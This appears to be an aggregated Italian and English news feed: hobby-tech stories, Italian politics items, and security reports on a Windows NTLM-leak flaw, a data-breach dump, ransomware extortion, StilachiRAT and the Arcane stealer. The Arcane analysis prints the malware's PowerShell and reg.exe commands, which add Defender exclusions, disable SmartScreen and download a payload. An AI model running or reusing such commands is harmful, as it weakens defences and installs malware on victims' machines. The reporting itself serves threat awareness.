Salta al contenuto principale



Reviving a Maplin 4600 DIY Synthesizer From the 1970s


A piece of musical history is the Maplin 4600, a DIY electronic music synthesizer from the 1970s. The design was published in an Australian electronics magazine and sold as a DIY kit, and [LOOK MUM NO COMPUTER] got his hands on an original Maplin 4600 that he refurbishes and puts through its paces.
Inserting conductive pegs is how the operator connects different inputs and outputs.
The Maplin 4600 is a (mostly) analog device with a slightly intimidating-looking layout. It features multiple oscillators, mixers, envelope generators, filters, and a complex-looking patch bay on the right hand side that is reminiscent of a breadboard. By inserting conductive pins, one can make connections between various inputs and outputs.

Internally the different features and circuits are mostly unconnected from one another by default, so the patch board is how the instrument is “programmed” and the connections made can be quite complex. The 4600 is one of a few synthesizer designs by [Trevor Marshall], who has some additional details about on his website.

The video (embedded below) is a complete walk-through of the unit, including its history, quirks, and design features. If you’d like to skip directly to a hands-on demonstrating how it works, that begins around the 10:15 mark.

Synthesizers have a rich DIY history and it’s fascinating to see an in-depth look at this one. And hey, if you like your synths complex and intimidating, do yourself a favor and check out the Starship One.

youtube.com/embed/S-tnRJZBEUk?…


hackaday.com/2025/03/19/revivi…



Falla critica in Esplora file di Windows ruba le password senza interazione dell’utente


Si tratta di un grave bug risolto da Microsoft nel patch tuesday di Marzo che ha visto pubblicato un exploit proof-of-concept (PoC) che dimostra come questa falla di sicurezza può essere sfruttata.

La vulnerabilità è presente in Esplora file di Windows, ed è identificata come CVE-2025-24071, consente agli aggressori di rubare password con hash NTLM senza alcuna interazione da parte dell’utente, se non la semplice estrazione di un file compresso.

La vulnerabilità consente l’esposizione di informazioni sensibili ad attori non autorizzati, consentendo attacchi di spoofing di rete. Un ricercatore di sicurezza con handle 0x6rss ha pubblicato un exploit proof-of-concept su GitHub il 16 marzo 2025. Il PoC include uno script Python che genera il file .library-ms dannoso e può essere utilizzato con un semplice comando: python poc.py

Scopriamo come funziona questo grave bug di sicurezza


La vulnerabilità, denominata “NTLM Hash Leak tramite estrazione RAR/ZIP”, sfrutta il meccanismo di elaborazione automatica dei file di Windows Explorer. Quando un file .library-ms appositamente creato contenente un percorso SMB dannoso viene estratto da un archivio compresso, Windows Explorer ne analizza automaticamente il contenuto per generare anteprime e metadati di indicizzazione.

Questa elaborazione automatica avviene anche se l’utente non apre mai esplicitamente il file estratto. Il formato file .library-ms, basato su XML è considerato affidabile da Windows Explorer. Deinisce le posizioni delle librerie, include un tag che punta a un server SMB controllato dall’aggressore, afferma il ricercatore di sicurezza “0x6rss”.

Durante l’estrazione, Windows Explorer tenta di risolvere automaticamente il percorso SMB incorporato (ad esempio, \\192.168.1.116\shared) per raccogliere i metadati. Questa azione innesca un handshake di autenticazione NTLM dal sistema della vittima al server dell’aggressore, facendo trapelare l’hash NTLMv2 della vittima senza alcuna interazione da parte dell’utente.

Utilizzando Procmon, possiamo osservare chiaramente che subito dopo l’estrazione del file .library-ms , le seguenti operazioni vengono eseguite automaticamente da Explorer.exe e dai servizi di indicizzazione come SearchProtocolHost.exe :

  • CreateFile: il file viene aperto automaticamente da Explorer.
  • ReadFile: il contenuto del file viene letto per estrarre i metadati.
  • QueryBasicInformationFile: query sui metadati eseguite.
  • CloseFile: il file viene chiuso dopo l’elaborazione.

Inoltre, SearchProtocolHost.exe viene richiamato come parte del servizio di indicizzazione dei file di Windows. Dopo che Explorer.exe termina la sua elaborazione iniziale, il servizio di indicizzazione riapre e legge il file per indicizzarne il contenuto. Ciò conferma ulteriormente la gestione automatizzata dei file al momento dell’estrazione:

  • CreateFile, ReadFile, QueryBasicInformationFile, CloseFile: eseguiti da SearchProtocolHost.exe per aggiungere il contenuto del file all’indice di ricerca.

Queste azioni dimostrano in modo conclusivo che Windows elabora automaticamente i file immediatamente dopo l’estrazione, senza alcuna interazione esplicita da parte dell’utente.

Sia Explorer.exe che SearchProtocolHost.exe leggono ed elaborano automaticamente il contenuto XML del file .library-ms , avviando un tentativo di connessione al percorso SMB incorporato al suo interno.

Sfruttamento della vulnerabilità nei mercati underground


Questa vulnerabilità è attivamente sfruttata dagli attaccanti ed è stata potenzialmente messa in vendita sul forum xss.is dall’autore della minaccia noto come “Krypt0n“. Questo Threat Actors è anche lo sviluppatore del malware denominato EncryptHub Stealer

L'articolo Falla critica in Esplora file di Windows ruba le password senza interazione dell’utente proviene da il blog della sicurezza informatica.



Italia col Botto! Esposti 35 database italiani nell’underground. tra questi anche Giustizia.it


Un recente post apparso sul noto forum underground BreachForums ha rivelato la pubblicazione di un pacchetto contenente 35 database italiani, esponendo informazioni sensibili di utenti e aziende. L’utente “Tanaka”, moderatore della piattaforma, ha condiviso una lista di archivi contenenti dati in formato SQL e CSV, suggerendo la possibile compromissione di diverse realtà, tra cui aziende private e persino entità istituzionali.

Disclaimer: Questo rapporto include screenshot e/o testo tratti da fonti pubblicamente accessibili. Le informazioni fornite hanno esclusivamente finalità di intelligence sulle minacce e di sensibilizzazione sui rischi di cybersecurity. Red Hot Cyber condanna qualsiasi accesso non autorizzato, diffusione impropria o utilizzo illecito di tali dati. Al momento, non è possibile verificare in modo indipendente l’autenticità delle informazioni riportate, poiché le organizzazioni coinvolte non hanno ancora rilasciato un comunicato ufficiale sul proprio sito web. Di conseguenza, questo articolo deve essere considerato esclusivamente a scopo informativo e di intelligence.

Tra le vittime anche siti istituzionali


Uno degli elementi più allarmanti di questa fuga di dati è la presenza nella lista del sito “giustizia.it”, portale istituzionale legato all’amministrazione della giustizia italiana. Se confermata, questa violazione potrebbe avere gravi implicazioni per la sicurezza dei dati giudiziari e delle persone coinvolte.

Oltre a questo, nell’elenco compaiono diverse aziende operanti in vari settori, tra cui il commercio online, il settore immobiliare e la tecnologia. Alcuni file fanno riferimento a database contenenti centinaia di migliaia di utenti, con informazioni che potrebbero includere credenziali di accesso, dati personali e altre informazioni sensibili.

L’importanza di un’analisi mirata


È altamente probabile che questi database siano il risultato di vecchie violazioni, riorganizzati e rivenduti nel mercato underground sotto forma di “collection” di credenziali. Questo fenomeno è comune nel dark web, dove gli attori malevoli combinano dati trapelati nel tempo per creare nuovi “combo list” utilizzabili per attacchi mirati.

Anche se alcune credenziali possono sembrare obsolete, è fondamentale prestare attenzione: molte di esse rimangono valide o vengono riutilizzate dagli utenti su più servizi. La diffusione di queste raccolte può infatti alimentare una nuova ondata di phishing e attacchi credential stuffing, aumentando il rischio per aziende e privati.

Le aziende e le entità citate nel post dovrebbero prendere immediati provvedimenti per verificare l’origine di questi database e comprendere se siano realmente frutto di una violazione diretta o se, invece, derivino da una compromissione indiretta di fornitori terzi o servizi connessi.

Se non hanno evidenza di una precedente intrusione, dovrebbero comunque effettuare un’indagine approfondita per escludere la possibilità di un data breach non ancora identificato. Un monitoraggio continuo e l’adozione di strategie di mitigazione del rischio sono fondamentali per proteggere i dati degli utenti e preservare la propria reputazione.

Un mercato sempre più attivo dei dati trafugati


Il forum BreachForums si è ormai affermato come uno dei principali hub per la vendita e la condivisione di database compromessi. Dopo la chiusura di RaidForums, piattaforma simile, BreachForums è rapidamente diventato il punto di riferimento per i cybercriminali interessati alla compravendita di dati sensibili.

Questa ennesima esposizione di dati italiani sottolinea ancora una volta l’importanza di misure di sicurezza adeguate, aggiornamenti tempestivi dei sistemi e una formazione continua sulla cybersecurity per prevenire future compromissioni.

Cosa fare se si è coinvolti? Le aziende e gli enti presenti nell’elenco dovrebbero:


  • Verificare la legittimità della presunta violazione.
  • Condurre un audit di sicurezza per individuare eventuali falle nei sistemi.
  • Forzare il reset delle credenziali per gli utenti coinvolti.
  • Monitorare il dark web per intercettare eventuali tentativi di vendita o abuso dei dati esposti.

In un contesto in cui le fughe di dati sono sempre più frequenti, la prevenzione e la reazione tempestiva restano le migliori strategie di difesa.

L'articolo Italia col Botto! Esposti 35 database italiani nell’underground. tra questi anche Giustizia.it proviene da il blog della sicurezza informatica.




#Trump e #Putin, diplomazia a due


altrenotizie.org/primo-piano/1…


Difesa europea, l’Ue adotta il Libro Bianco per rilanciare industria e deterrenza

@Notizie dall'Italia e dal mondo

La Commissione europea ha ufficialmente adottato il Libro Bianco per la Difesa europea/Readiness 2030, un documento che avrà il compito di porre le basi per un’azione coordinata e massiccia nel settore della difesa, con l’obiettivo di rafforzare la capacità



Sicurezza comune prima del riarmo. La posizione italiana al consiglio Ue

@Notizie dall'Italia e dal mondo

“Se sto con Usa o Ue? Sto con l’Italia, che è nell’Unione europea ed è storico alleato dell’America”. La precisazione di Giorgia Meloni alla Camera a chi le chiedeva (ancora) conto delle divergenze di vedute tra Bruxelles e Washington è utile cartina di tornasole per capire



Giovanni Floris scherza con Elisabetta Piccolotti sul caso Tesla: “È venuta in taxi spero” | VIDEO


@Politica interna, europea e internazionale
Ospite di DiMartedì, il programma in onda su La7 nella serata di martedì 18 marzo, Elisabetta Piccolotti è stata presentata dal conduttore Giovanni Floris con una battuta inerente al caso Tesla scoppiato nei giorni scorsi. La deputata di Alleanza Verdi e




KoSpy: il nuovo spyware nordcoreano nell’app store Android


@Informatica (Italy e non Italy 😁)
App malevole, mascherate da applicazioni di utility per indurre gli utenti all’installazione, in precedenza disponibili per il download nel Google Play Store e in seguito rimosse, sono state individuate anche su app store di terze parti. Il nuovo spyware KoSpy è attribuito al gruppo



Meta is preparing for the Australian election by working closely with the government and news outlets that Zuckerberg said were “clearly political” and dismissed in the US.#News
#News



The sites an ICE contractor is pulling data from; why top scientists are considering leaving the U.S. for France, and why Super Nintendos are getting faster as they age.#Podcast


So What is a Supercomputer Anyway?


Over the decades there have been many denominations coined to classify computer systems, usually when they got used in different fields or technological improvements caused significant shifts. While the very first electronic computers were very limited and often not programmable, they would soon morph into something that we’d recognize today as a computer, starting with World War 2’s Colossus and ENIAC, which saw use with cryptanalysis and military weapons programs, respectively.

The first commercial digital electronic computer wouldn’t appear until 1951, however, in the form of the Ferranti Mark 1. These 4.5 ton systems mostly found their way to universities and kin, where they’d find welcome use in engineering, architecture and scientific calculations. This became the focus of new computer systems, effectively the equivalent of a scientific calculator. Until the invention of the transistor, the idea of a computer being anything but a hulking, room-sized monstrosity was preposterous.

A few decades later, more computer power could be crammed into less space than ever before including ever higher density storage. Computers were even found in toys, and amidst a whirlwind of mini-, micro-, super-, home-, minisuper- and mainframe computer systems, one could be excused for asking the question: what even is a supercomputer?

Today’s Supercomputers

ORNL's Summit supercomputer, fastest until 2020 (Credit: ORNL)ORNL’s Summit supercomputer, fastest until 2020 (Credit: ORNL)
Perhaps a fair way to classify supercomputers is that the ‘supercomputer’ aspect is a highly time-limited property. During the 1940s, Colossus and ENIAC were without question the supercomputers of their era, while 1976’s Cray-1 wiped the floor with everything that came before, yet all of these are archaic curiosities next to today’s top two supercomputers. Both the El Capitan and Frontier supercomputers are exascale (1+ exaFLOPS in double precision IEEE 754 calculations) level machines, based around commodity x86_64 CPUs in a massively parallel configuration.

Taking up 700 m2 of floor space at the Lawrence Livermore National Laboratory (LLNL) and drawing 30 MW of power, El Capitan’s 43,808 AMD EPYC CPUs are paired with the same number of AMD Instinct MI300A accelerators, each containing 24 Zen 4 cores plus CDNA3 GPU and 128 GB of HBM3 RAM. Unlike the monolithic ENIAC, El Capitan’s 11,136 nodes, containing four MI300As each, rely on a number of high-speed interconnects to distribute computing work across all cores.

At LLNL, El Capitan is used for effectively the same top secret government things as ENIAC was, while Frontier at Oak Ridge National Laboratory (ORNL) was the fastest supercomputer before El Capitan came online about three years later. Although currently LLNL and ORNL have the fastest supercomputers, there are many more of these systems in use around the world, even for innocent scientific research.

Looking at the current list of supercomputers, such as today’s Top 9, it’s clear that not only can supercomputers perform a lot more operations per second, they also are invariably massively parallel computing clusters. This wasn’t a change that was made easily, as parallel computing comes with a whole stack of complications and problems.

The Parallel Computing Shift

ILLIAC IV massively parallel computer's Control Unit (CU). (Credit: Steve Jurvetson, Wikimedia)ILLIAC IV massively parallel computer’s Control Unit (CU). (Credit: Steve Jurvetson, Wikimedia)
The first massively parallel computer was the ILLIAC IV, conceptualized by Daniel Slotnick in 1952 and first successfully put into operation in 1975 when it was connected to ARPANET. Although only one quadrant was fully constructed, it produced 50 MFLOPS compared to the Cray-1’s 160 MFLOPS a year later. Despite the immense construction costs and spotty operational history, it provided a most useful testbed for developing parallel computation methods and algorithms until the system was decommissioned in 1981.

There was a lot of pushback against the idea of massively parallel computation, however, with Seymour Cray famously comparing the idea of using many parallel vector processors instead of a single large one akin to ‘plowing a field with 1024 chickens instead of two oxen’.

Ultimately there is only so far you can scale a singular vector processor, of course, while parallel computing promised much better scaling, as well as the use of commodity hardware. A good example of this is a so-called Beowulf cluster, named after the original 1994 parallel computer built by Thomas Sterling and Donald Becker at NASA. This can use plain desktop computers, wired together using for example Ethernet and with open source libraries like Open MPI enabling massively parallel computing without a lot of effort.

Not only does this approach enable the assembly of a ‘supercomputer’ using cheap-ish, off-the-shelf components, it’s also effectively the approach used for LLNL’s El Capitan, just with not very cheap hardware, and not very cheap interconnect hardware, but still cheaper than if one were to try to build a monolithic vector processor with the same raw processing power after taking the messaging overhead of a cluster into account.

Mini And Maxi

David Lovett of Usagi Electric fame sitting among his FPS minisupercomputer hardware. (Credit: David Lovett, YouTube)David Lovett of Usagi Electric fame sitting among his FPS minisupercomputer hardware. (Credit: David Lovett, YouTube)
One way to look at supercomputers is that it’s not about the scale, but what you do with it. Much like how government, large businesses and universities would end up with ‘Big Iron’ in the form of mainframes and supercomputers, there was a big market for minicomputers too. Here ‘mini’ meant something like a PDP-11 that’d comfortably fit in the corner of an average room at an office or university.

The high-end versions of minicomputers were called ‘superminicomputer‘, which is not to be confused with minisupercomputer, which is another class entirely. During the 1980s there was a brief surge in this latter class of supercomputers that were designed to bring solid vector computing and similar supercomputer feats down to a size and price tag that might entice departments and other customers who’d otherwise not even begin to consider such an investment.

The manufacturers of these ‘budget-sized supercomputers’ were generally not the typical big computer manufacturers, but instead smaller companies and start-ups like Floating Point Systems (later acquired by Cray) who sold array processors and similar parallel, vector computing hardware.

Recently David Lovett (AKA Mr. Usagi Electric) embarked on a quest to recover and reverse-engineer as much FPS hardware as possible, with one of the goals being to build a full minisupercomputer system as companies and universities might have used them in the 1980s. This would involve attaching such an array processor to a PDP-11/44 system.

Speed Versus Reliability


Amidst all of these definitions, the distinction between a mainframe and a supercomputer is much easier and more straightforward at least. A mainframe is a computer system that’s designed for bulk data processing with as much built-in reliability and redundancy as the price tag allows for. A modern example is IBM’s Z-series of mainframes, with the ‘Z’ standing for ‘zero downtime’. These kind of systems are used by financial institutions and anywhere else where downtime is counted in millions of dollars going up in (literal) flames every second.

This means hot-swappable processor modules, hot-swappable and redundant power supplies, not to mention hot spares and a strong focus on fault tolerant computing. All of these features are less relevant for a supercomputer, where raw performance is the defining factor when running days-long simulations and when other ways to detect flaws exist without requiring hardware-level redundancy.

Considering the brief lifespan of supercomputers (currently in the order of a few years) compared to mainframes (decades) and the many years that the microcomputers which we have on our desks can last, the life of a supercomputer seems like that of a bright and very brief flame, indeed.

Top image: Marlyn Wescoff and Betty Jean Jennings configuring plugboards on the ENIAC computer (Source: US National Archives)


hackaday.com/2025/03/19/so-wha…



Se non paghi chiamo Edward Snowden. Nuove tattiche di estorsione prendono forma


Gli specialisti Fortra hanno scoperto un nuovo gruppo ransomware dal nome Ox Thief, che utilizza metodi non convenzionali per fare pressione sulle vittime. In un caso recente, gli aggressori hanno minacciato di contattare Edward Snowden se le loro richieste non fossero state soddisfatte. Questa mossa potrebbe indicare che alcuni criminali informatici hanno difficoltà a riscuotere il riscatto.

Ox Thief ha iniziato le sue operazioni in modo tradizionale: il gruppo ha annunciato sul suo sito Tor di aver rubato 47 GB di “file altamente sensibili” da un’azienda. Per dimostrare l’autenticità delle loro affermazioni, gli hacker hanno fornito campioni di dati e hanno minacciato di pubblicare tutte le informazioni se la vittima non avesse pagato il riscatto.

Tuttavia, la tattica è andata oltre lo scenario consueto della seconda estorsione. I criminali hanno pubblicato un elenco dettagliato delle possibili conseguenze del rifiuto di pagare: cause legali, multe multimilionarie, responsabilità penale, perdita di reputazione e gravi costi per rispondere all’incidente. Come esempi, i criminali informatici hanno citato casi reali di perdite importanti: Capitale One nel 2019 e Uber nel 2016.

Ox Thief ha anche minacciato di attirare l’attenzione di importanti esperti di sicurezza informatica e di organizzazioni per i diritti umani, tra cui il giornalista Brian Krebs, il fondatore di Have I Been Pwned Troy Hunt, l’Electronic Frontier Foundation (EFF) e persino il gruppo per i diritti umani NYOB. Tra i possibili “informatori” viene menzionato anche Edward Snowden, il che sembra un tentativo di aumentare la pressione sulla vittima.

Questo metodo ricorda la tattica del gruppo ALPHV/BlackCat, che nel 2023 ha presentato un reclamo contro MeridianLink. Tuttavia, secondo gli analisti di Fortra, le azioni di Ox Thief rappresentano una nuova fase nell’evoluzione dell’estorsione. Gli aggressori oggi fanno affidamento non solo sulla pressione psicologica, ma anche sulla paura di azioni legali e di interventi governativi.

Inoltre, il cambiamento di strategia potrebbe essere correlato a un calo dei pagamenti agli estorsori. Se le organizzazioni sono meno propense a fare concessioni, i criminali sono costretti a escogitare nuovi modi per esercitare pressione.

Il nuovo gruppo è stato notato all’inizio di marzo, dopo aver annunciato che Broker Educational Sales & Training (BEST), un’azienda che forma professionisti del settore finanziario e assicurativo, era stata hackerata. Gli hacker hanno affermato di aver rubato dati personali, resoconti finanziari, documenti assicurativi e contratti dei dipendenti. Tuttavia, non esiste alcuna conferma indipendente dell’incidente. La situazione è complicata dal fatto che un altro gruppo, Medusa, aveva precedentemente rilasciato dichiarazioni simili in merito all’hacking di BEST.

L'articolo Se non paghi chiamo Edward Snowden. Nuove tattiche di estorsione prendono forma proviene da il blog della sicurezza informatica.



Meloni contro il Manifesto di Ventotene: “Non è questa la mia idea di Europa” | VIDEO


@Politica interna, europea e internazionale
La presidente del Consiglio Giorgia Meloni prende le distanze dal Manifesto di Ventotene, considerato uno dei testi fondanti dell’Unione europea: “Non so se questa è la vostra idea di Europa, ma certamente non è la mia”, dice rivolgendosi alle opposizioni in




Mattarella scrive a Papa Francesco: “In questo mondo la sua voce è più che mai necessaria”


@Politica interna, europea e internazionale
“Mentre al livello internazionale sembrano affievolirsi le ragioni del Diritto e di una corretta articolazione della convivenza tra gli Stati, la Sua voce è e resta più che mai necessaria”. Lo scrive il presidente della Repubblica Sergio Mattarella in una lettera



“Glasses” That Transcribe Text To Audio


Glasses for the blind might sound like an odd idea, given the traditional purpose of glasses and the issue of vision impairment. However, eighth-grade student [Akhil Nagori] built these glasses with an alternate purpose in mind. They’re not really for seeing. Instead, they’re outfitted with hardware to capture text and read it aloud.

Yes, we’re talking about real-time text-to-audio transcription, built into a head-worn format. The hardware is pretty straightforward: a Raspberry Pi Zero 2W runs off a battery and is outfitted with the usual first-party camera. The camera is mounted on a set of eyeglass frames so that it points at whatever the wearer might be “looking” at. At the push of a button, the camera captures an image, and then passes it to an API which does the optical character recognition. The text can then be passed to a speech synthesizer so it can be read aloud to the wearer.

It’s funny to think about how advanced this project really is. Jump back to the dawn of the microcomputer era, and such a device would have been a total flight of fancy—something a researcher might make a PhD and career out of. Indeed, OCR and speech synthesis alone were challenge enough. Today, you can stand on the shoulders of giants and include such mighty capability in a homebrewed device that cost less than $50 to assemble. It’s a neat project, too, and one that we’re sure taught [Akhil] many valuable skills along the way.

youtube.com/embed/ApshHWClGoI?…


hackaday.com/2025/03/19/glasse…



Arcane stealer: We want all your data


At the end of 2024, we discovered a new stealer distributed via YouTube videos promoting game cheats. What’s intriguing about this malware is how much it collects. It grabs account information from VPN and gaming clients, and all kinds of network utilities like ngrok, Playit, Cyberduck, FileZilla and DynDNS. The stealer was named Arcane, not to be confused with the well-known Arcane Stealer V. The malicious actor behind Arcane went on to release a similarly named loader, which supposedly downloads cheats and cracks, but in reality delivers malware to the victim’s device.

Distribution


The campaign in which we discovered the new stealer was already active before Arcane appeared. The original distribution method started with YouTube videos promoting game cheats. The videos were frequently accompanied by a link to an archive and a password to unlock it. Upon unpacking the archive, the user would invariably discover a start.bat batch file in the root folder and the UnRAR.exe utility in one of the subfolders.

Archive root
Archive root

Contents of the "natives" subfolder
Contents of the “natives” subfolder

The contents of the batch file were obfuscated. Its only purpose was to download another password-protected archive via PowerShell, and unpack that with UnRAR.exe with the password embedded in the BATCH file as an argument.

Contents of the obfuscated start.bat file
Contents of the obfuscated start.bat file

Following that, start.bat would use PowerShell to launch the executable files from the archive. While doing so, it added every drive root folder to SmartScreen filter exceptions. It then reset the EnableWebContentEvaluation and SmartScreenEnabled registry keys via the system console utility reg.exe to disable SmartScreen altogether.
powershell -Command "Get-PSDrive -PSProvider FileSystem | ForEach-Object {Add-MpPreference -ExclusionPath $_.Root}"
reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
powershell -Command "(New-Object Net.WebClient).DownloadString(\'https://pastebin.com/raw/<redacted>\')"
powershell -Command "(New-Object Net.WebClient).DownloadFile(\'https://www.dropbox.com/scl/fi/<redacted>/black.rar?rlkey=<redacted>&st=<redacted>&dl=1\', \'C:\\Users\\<redacted>\\AppData\\Local\\Temp\\black.rar\')"

Key commands run by start.bat

The archive would always contain two executables: a miner and a stealer.

Contents of the downloaded archive
Contents of the downloaded archive

The stealer was a Phemedrone Trojan variant, rebranded by the attackers as “VGS”. They used this name in the logo, which, when generating stealer activity reports, is written to the beginning of the file along with the date and time of the report’s creation.

Phemedrone and VGS logos
Phemedrone and VGS logos

Original distribution scheme
Original distribution scheme

Arcane replaces VGS


At the end of 2024, we discovered a new Arcane stealer distributed as part of the same campaign. It is worth noting that a stealer with a similar name has been encountered before: a Trojan named “Arcane Stealer V” was offered on the dark web in 2019, but it shares little with our find. The new stealer takes its name from the ASCII art in the code.

Arcane logo
Arcane logo

Arcane succeeded VGS in November. Although much of it was borrowed from other stealers, we could not attribute it to any of the known families.

Arcane gets regular updates, so its code and capabilities change from version to version. We will describe the common functionality present in various modifications and builds. In addition to logins, passwords, credit card data, tokens and other credentials from various Chromium and Gecko-based browsers, Arcane steals configuration files, settings and account information from the following applications:

  • VPN clients: OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, Proton, hidemy.name, PIA, CyberGhost, ExpressVPN
  • Network clients and utilities: ngrok, Playit, Cyberduck, FileZilla, DynDNS
  • Messaging apps: ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, Viber
  • Email clients: Outlook
  • Gaming clients and services: Riot Client, Epic, Steam, Ubisoft Connect (ex-Uplay), Roblox, Battle.net, various Minecraft clients
  • Crypto wallets: Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, Coinomi

In addition, the stealer collects all kinds of system information, such as the OS version and installation date, digital key for system activation and license verification, username and computer name, location, information about the CPU, memory, graphics card, drives, network and USB devices, and installed antimalware and browsers. Arcane also takes screenshots of the infected device, obtains lists of running processes and Wi-Fi networks saved in the OS, and retrieves the passwords for those networks.

Arcane’s functionality for stealing data from browsers warrants special attention. Most browsers generate unique keys for encrypting sensitive data they store, such as logins, passwords, cookies, etc. Arcane uses the Data Protection API (DPAPI) to obtain these keys, which is typical of stealers. But Arcane also contains an executable file of the Xaitax utility, which it uses to crack browser keys. To do this, the utility is dropped to disk and launched covertly, and the stealer obtains all the keys it needs from its console output.

The stealer implements an additional method for extracting cookies from Chromium-based browsers through a debug port. The Trojan secretly launches a copy of the browser with the “remote-debugging-port” argument, then connects to the debug port, issues commands to visit several sites, and requests their cookies. The list of resources it visits is provided below.


ArcanaLoader


Within a few months of discovering the stealer, we noticed a new distribution pattern. Rather than promoting cheats, the threat actors shifted to advertising ArcanaLoader on their YouTube channels. This is a loader with a graphical user interface for downloading and running the most popular cracks, cheats and other similar software. More often than not, the links in the videos led to an executable file that downloaded an archive with ArcanaLoader.

ArcanaLoader
ArcanaLoader

See translation

ЧитыCheats
НастройкиSettings
Клиенты с читамиClients with cheats
Все версииAll versions
Введите название читаEnter cheat name
Версия: 1.16.5Version: 1.16.5
ЗапуститьStart
Версия: Все ВерсииVersion: All versions

The loader itself included a link to the developers’ Discord server, which featured channels for news, support and links to download new versions.

Discord server invitation
Discord server invitation

See translation
You have been invited to Arcana Loader
548 online
3,156 users
Accept invitation

At the same time, one of the Discord channels posted an ad, looking for bloggers to promote ArcanaLoader.

Looking for bloggers to spread the loader
Looking for bloggers to spread the loader

See translation
ArcanaLoader BOT
Form:
1. Total subscribers
2. Average views per week
3. Link to ArcanaLoader video
4. Screenshot proof of channel ownership
YOUTUBE
Criteria:
1. 600* subscribers
2. 1,500+ views
3. Links to 2 Arcana Loader videos
Permissions:
1. Send your videos to the #MEDIA chat
2. Personal server role
3. Add cheat to loader without delay
4. Access to @everyone in the #MEDIA chat
5. Possible compensation in rubles for high traffic
MEDIA
Criteria:
1. 50+ subscribers
2. 150+ views
3. Link to 1 ArcanaLoader video
Permissions:
1. Send your videos to the #MEDIA chat
2. Personal server role

Sadly, the main ArcanaLoader executable contained the aforementioned Arcane stealer.

Victims


All conversations on the Discord server are in Russian, the language used in the news channels and YouTube videos. Apparently, the attackers target a Russian-speaking audience. Our telemetry confirms this assumption: most of the attacked users were in Russia, Belarus and Kazakhstan.

Takeaways


Attackers have been using cheats and cracks as a popular trick to spread all sorts of malware for years, and they’ll probably keep doing so. What’s interesting about this particular campaign is that it illustrates how flexible cybercriminals are, always updating their tools and the methods of distributing them. Besides, the Arcane stealer itself is fascinating because of all the different data it collects and the tricks it uses to extract the information the attackers want. To stay safe from these threats, we suggest being wary of ads for shady software like cheats and cracks, avoiding links from unfamiliar bloggers, and using strong security software to detect and disarm rapidly evolving malware.


securelist.com/arcane-stealer/…



Make Fancy Resin Printer 3D Models FDM-Friendly


Do you like high-detail 3D models intended for resin printing, but wish you could more easily print them on a filament-based FDM printer? Good news, because [Jacob] of Painted4Combat shared a tool he created to make 3D models meant for resin printers — the kind popular with tabletop gamers — easier to port to FDM. It comes in the form of a Blender add-on called Resin2FDM. Intrigued, but wary of your own lack of experience with Blender? No problem, because he also made a video that walks you through the whole thing step-by-step.
Resin2FDM separates the model from the support structure, then converts the support structure to be FDM-friendly.
3D models intended for resin printing aren’t actually any different, format-wise, from models intended for FDM printers. The differences all come down to the features of the model and how well the printer can execute them. Resin printing is very different from FDM, so printing a model on the “wrong” type of printer will often have disappointing results. Let’s look at why that is, to better understand what makes [Jacob]’s tool so useful.

Rafts and a forest of thin tree-like supports are common in resin printing. In the tabletop gaming scene, many models come pre-supported for convenience. A fair bit of work goes into optimizing the orientation of everything for best printed results, but the benefits don’t carry directly over to FDM.

For one thing, supports for resin prints are usually too small for an FDM printer to properly execute — they tend to be very thin and very tall, which is probably the least favorable shape for FDM printing. In addition, contact points where each support tapers down to a small point that connects to the model are especially troublesome; FDM slicer software will often simply consider those features too small to bother trying to print. Supports that work on a resin printer tend to be too small or too weak to be effective on FDM, even with a 0.2 mm nozzle.

To solve this, [Jacob]’s tool allows one to separate the model itself from the support structure. Once that is done, the tool further allows one to tweak the nest of supports, thickening them up just enough to successfully print on an FDM printer, while leaving the main model unchanged. The result is a support structure that prints well via FDM, allowing the model itself to come out nicely, with a minimum of alterations to the original.

Resin2FDM is available in two versions, the Lite version is free and an advanced version with more features is available to [Jacob]’s Patreon subscribers. The video (embedded below) covers everything from installation to use, and includes some general tips for best results. Check it out if you’re interested in how [Jacob] solved this problem, and keep it in mind for the next time you run across a pre-supported model intended for resin printing that you wish you could print with FDM.

youtube.com/embed/zZp-CLhH1Ao?…


hackaday.com/2025/03/19/make-f…



StilachiRAT: il malware fantasma che ruba credenziali e criptovalute senza lasciare traccia!


Un nuovo pericoloso Remote Access Trojan (RAT) altamente sofisticato, denominato StilachiRAT, sta circolando con l’obiettivo di sottrarre credenziali, dati sensibili e criptovalute. Questo malware utilizza tecniche avanzate di evasione per rimanere inosservato, garantire la persistenza e permettere ai cybercriminali di operare indisturbati.

Un RAT su misura per lo spionaggio e il furto


Scoperto a novembre 2024 dai ricercatori di Microsoft Incident Response, StilachiRAT si distingue per la sua capacità di infiltrarsi nei sistemi target senza destare sospetti.

Tra le sue principali funzioni troviamo:

  • Furto di credenziali: estrae informazioni sensibili salvate nei browser, inclusi i dati delle criptovalute.
  • Monitoraggio dell’attività utente: raccoglie dati di sistema, rileva la presenza di telecamere, analizza sessioni RDP attive e le applicazioni in esecuzione.
  • Attacco alle criptovalute: scansiona la configurazione di oltre 20 wallet digitali, tra cui Coinbase Wallet, Metamask e Trust Wallet.
  • Persistenza e movimento laterale: sfrutta Windows Service Control Manager per rimanere attivo e persiste anche dopo tentativi di rimozione.


Attacco silenzioso e pericoloso


StilachiRAT non si limita a raccogliere informazioni, ma implementa anche funzionalità avanzate per evitare il rilevamento:

  • Cancellazione dei log di sistema: elimina tracce dell’attacco per impedire indagini forensi.
  • Evasione da sandbox: utilizza chiamate API offuscate per rendere l’analisi più complessa.
  • Manipolazione delle finestre di sistema: monitora l’attività dell’utente per carpire password e dati sensibili direttamente dallo schermo.

Una volta insediato, StilachiRAT permette ai criminali di controllare il dispositivo infetto tramite comandi da un server C2. Questi comandi includono:

  • Esecuzione di applicazioni malevole;
  • Riavvio o sospensione del sistema;
  • Modifica di chiavi di registro di Windows;
  • Creazione di proxy per camuffare il traffico malevolo.


Difendersi è possibile


Sebbene Microsoft non abbia ancora attribuito StilachiRAT a un gruppo specifico, la sua pericolosità è evidente. Per ridurre il rischio di infezione, è essenziale adottare alcune contromisure:

  • Scaricare software esclusivamente da fonti ufficiali;
  • Utilizzare soluzioni di sicurezza avanzate che blocchino domini e allegati sospetti;
